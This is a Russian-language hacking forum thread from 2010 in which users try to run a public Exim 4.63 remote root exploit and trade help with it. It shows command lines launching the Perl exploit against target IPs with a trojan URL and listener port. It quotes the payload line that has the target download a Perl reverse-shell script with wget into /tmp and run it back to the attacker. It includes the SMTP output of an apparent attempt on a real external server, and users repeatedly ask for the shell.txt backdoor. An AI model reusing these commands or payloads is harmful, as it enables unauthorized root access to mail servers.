Exim 4.63 Remote Root Exploit

Discussion in 'Безопасность и Анонимность' started by 3dx, 13 Dec 2010.

  1. 3dx

    3dx New Member

    Joined:
    12 Sep 2009
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Взал тут http://www.exploit-db.com/exploits/15725/

    При запуски выдает ошибку, и что за фаил shell.txt
    Я побывал в shell.txt положить эксплойт шелов но не один не сработал.

    Code:
    perl 15725.pl 10.1.1.117 http://10.1.1.115/shell.txt 10.1.1.115 4444
    Can't use an undefined value as a symbol reference at 15725.pl line 79.
    
    или так
    Code:
    perl 15725.pl 10.1.1.117 http://encodable.com/uploaddemo/files/shell.txt 10.1.1.115 4444
    Can't use an undefined value as a symbol reference at 15725.pl line 79.

    Научите как правильно работать с подобными эксплойтами.
     
  2. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    Проверил , все работает. Может неправльно скопировал? У тебя сразу ошибка вылетает? У меня все сработало
     
    #2 kfor, 13 Dec 2010
    Last edited: 13 Dec 2010
    1 person likes this.
  3. Acetoacidophilum

    Joined:
    14 May 2006
    Messages:
    0
    Likes Received:
    4
    Reputations:
    0
    у тебя 79 строка

    print $sock "EHLO $helohost\r\n";

    это?

    в файле 15725.pl
     
  4. 3dx

    3dx New Member

    Joined:
    12 Sep 2009
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Было куча ошибок и все с print поправил THANKS, может мне опубликовать исходник shell.txt
     
    1 person likes this.
  5. Acetoacidophilum

    Joined:
    14 May 2006
    Messages:
    0
    Likes Received:
    4
    Reputations:
    0
    Конешно опубликуй.

    Вот у меня

    220 adagency.eorezo.com ESMTP Exim Fri, 17 Dec 2010 13:13:20 +0100
    250-adagency.eorezo.com Hello abcde.com [193.105.240.15]
    250-SIZE 20971520
    Set size to 20971520 !
    250-PIPELINING
    250 HELP
    250 OK
    550 Relay not permitted
    503 valid RCPT command must precede DATA
    Sending large buffer, please wait...

    550 Relay not permitted-это не значит ли что не сработает эксплойт?
    Хотя потом Sending large buffer, please wait...
    но в консоле где nc нема рута?
    В чем дело кто знает?
     
  6. Acetoacidophilum

    Joined:
    14 May 2006
    Messages:
    0
    Likes Received:
    4
    Reputations:
    0
    и когда please wait... говорит сколько надо ждать*?
     
  7. emomasson

    emomasson Member

    Joined:
    27 Jul 2010
    Messages:
    174
    Likes Received:
    12
    Reputations:
    5
    Нормально пропатченая система... Здать до выхода нового ксплоита.
     
  8. Acetoacidophilum

    Joined:
    14 May 2006
    Messages:
    0
    Likes Received:
    4
    Reputations:
    0
    При юзании http://www.exploit-db.com/exploits/15725/
    надо я как понял чтоб на уязвимом хосте были
    1-nc
    2-gcc
    3-wget

    Это еще не понятно слипинг, это в секундах он спать будет?
    $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} ";
     
  9. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Что делать? :( И выложите пожалуйста shell.txt